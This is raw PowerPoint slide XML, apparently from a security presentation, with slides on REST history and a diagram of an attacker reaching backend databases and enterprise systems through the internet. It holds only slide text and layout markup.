            <a:ext cx="387096" cy="162229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66" idx="2"/>
            <a:endCxn id="70" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7315200" y="1434163"/>
            <a:ext cx="381000" cy="273473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a:off x="7315200" y="2133602"/>
            <a:ext cx="388219" cy="198119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65" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7315200" y="2773682"/>
            <a:ext cx="381000" cy="139522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67" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7315200" y="3459480"/>
            <a:ext cx="373781" cy="70104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69" idx="2"/>
            <a:endCxn id="70" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7315200" y="4160520"/>
            <a:ext cx="373781" cy="838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32" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7315200" y="4168902"/>
            <a:ext cx="373781" cy="67741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739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REST History</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="990600"/>
            <a:ext cx="8229600" cy="5562600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Introduced to the world in a PHD dissertation by Roy Fielding in 2000.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Promoted the idea of using HTTP methods (PUT, POST, GET, DELETE) and the URL itself to communicate additional metadata as to the nature of an HTTP request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PUT = Update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POST = Insert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GET = Select</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DELETE = Delete</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Allowed the mapping of DB interactions on top of self descriptive URLs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370319962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REST History (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>con’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8229600" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When REST originally came out, it was harshly  criticized by the security community as being inherently unsafe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As a result REST, applications were originally developed to only run on internal networks (non-public access).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This allowed developers to develop REST APIs in a kind of “Garden of Eden”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This also encouraged REST to become a popular interface for internal backend systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Once developers got comfortable with REST internal applications they are now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RESTifying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> all publically exposed application interfaces</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="115475474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4038600" y="838200"/>
            <a:ext cx="4419600" cy="5486400"/>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 name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="838200"/>
            <a:ext cx="1447800" cy="5486400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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04800" y="122238"/>
            <a:ext cx="8534400" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacking Backend Systems (Old School)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Block Arc 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2133600" y="2057401"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Cloud 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="2301240"/>
            <a:ext cx="1447800" cy="426719"/>
          </a:xfrm>
          <a:prstGeom prst="clou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Internet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="2514599"/>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11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2362200" y="2514600"/>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14" name="Flowchart: Terminator 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2592324" y="2363726"/>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BH2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Block Arc 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="3581400" y="2057402"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="2514600"/>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19" name="Straight Arrow Connector 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3810000" y="2514600"/>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20" name="Flowchart: Terminator 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4037076" y="23637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AS2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645152" y="2514599"/>
            <a:ext cx="381000" cy="1"/>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22" name="Flowchart: Terminator 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4722876" y="2363726"/>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SAP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Block Arc 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2133600" y="5257799"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Cloud 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="5501638"/>
            <a:ext cx="1447800" cy="426719"/>
          </a:xfrm>
          <a:prstGeom prst="clou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Internet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Straight Arrow Connector 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="5714997"/>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29" name="Straight Arrow Connector 28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2362200" y="5714997"/>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30" name="Flowchart: Terminator 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2592324" y="5564124"/>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BH5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Block Arc 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="3581400" y="5257800"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Straight Arrow Connector 31"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="5714998"/>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33" name="Straight Arrow Connector 32"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3810000" y="5714998"/>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34" name="Flowchart: Terminator 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4037076" y="5564123"/>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AS5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="35" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645152" y="5714997"/>
            <a:ext cx="381000" cy="1"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Flowchart: Terminator 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4722876" y="5564124"/>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t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Block Arc 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2136648" y="4191001"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Cloud 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="307848" y="4434840"/>
            <a:ext cx="1447800" cy="426719"/>
          </a:xfrm>
          <a:prstGeom prst="clou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Internet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Straight Arrow Connector 38"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1755648" y="4648199"/>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40" name="Straight Arrow Connector 39"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2365248" y="4648199"/>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41" name="Flowchart: Terminator 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2595372" y="4497326"/>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BH4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Block Arc 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="3584448" y="4191002"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Straight Arrow Connector 42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3203448" y="4648200"/>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44" name="Straight Arrow Connector 43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3813048" y="4648200"/>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45" name="Flowchart: Terminator 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4040124" y="44973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AS4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="46" name="Straight Arrow Connector 45"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="4648199"/>
            <a:ext cx="381000" cy="1"/>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
        <p:nvSpPr>
          <p:cNvPr id="47" name="Flowchart: Terminator 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4725924" y="4497326"/>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ERP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Block Arc 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2133600" y="990600"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="50" name="Straight Arrow Connector 49"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="1447798"/>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51" name="Straight Arrow Connector 50"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2362200" y="1447798"/>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52" name="Flowchart: Terminator 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2592324" y="12969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BH1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Block Arc 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="3581400" y="990601"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54" name="Straight Arrow Connector 53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="1447799"/>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55" name="Straight Arrow Connector 54"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3810000" y="1447799"/>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56" name="Flowchart: Terminator 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4037076" y="1296924"/>
            <a:ext cx="914400" cy="301752"/>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AS1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57" name="Straight Arrow Connector 56"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645152" y="1447798"/>
            <a:ext cx="381000" cy="1"/>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58" name="Flowchart: Terminator 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4722876" y="1296925"/>
            <a:ext cx="914400" cy="301752"/>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Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Block Arc 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2133600" y="3124201"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Cloud 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="3368040"/>
            <a:ext cx="1447800" cy="426719"/>
          </a:xfrm>
          <a:prstGeom prst="clou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Internet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="61" name="Straight Arrow Connector 60"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="3581399"/>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62" name="Straight Arrow Connector 61"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2362200" y="3581400"/>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63" name="Flowchart: Terminator 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2592324" y="3430526"/>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BH3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Block Arc 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="3581400" y="3124202"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="65" name="Straight Arrow Connector 64"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="3581400"/>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66" name="Straight Arrow Connector 65"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3810000" y="3581400"/>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67" name="Flowchart: Terminator 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4037076" y="34305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AS3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="68" name="Straight Arrow Connector 67"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645152" y="3581399"/>
            <a:ext cx="381000" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:headEnd type="arrow"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Flowchart: Terminator 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4838700" y="3314702"/>
            <a:ext cx="914400" cy="533400"/>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MS SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Cloud 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1219200"/>
            <a:ext cx="1600200" cy="426719"/>
          </a:xfrm>
          <a:prstGeom prst="clou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Attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Can 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162800" y="1752600"/>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Mongo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Can 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7170019" y="2423162"/>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Couch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Can 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7170019" y="1083643"/>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Neo4j</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Can 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162800" y="3108960"/>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Cassan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Can 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867400" y="990600"/>
            <a:ext cx="914400" cy="838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LDAP/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>AD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Can 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162800" y="3810000"/>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HBase</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Left-Right Arrow Callout 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5718048" y="2013204"/>
            <a:ext cx="1216152" cy="4158996"/>
          </a:xfrm>
          <a:prstGeom prst="lef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EAI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>EII</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ESB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="78" name="Straight Arrow Connector 77"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="6553199"/>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79" name="TextBox 78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466721" y="6412468"/>
            <a:ext cx="6238879" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Http Protocol (proprietary protocols are different colors)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="56" idx="2"/>
            <a:endCxn id="22" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645152" y="1447800"/>
            <a:ext cx="384048" cy="1066802"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:prstDash val="dashDot"/>
            <a:headEnd type="arrow"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Can 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
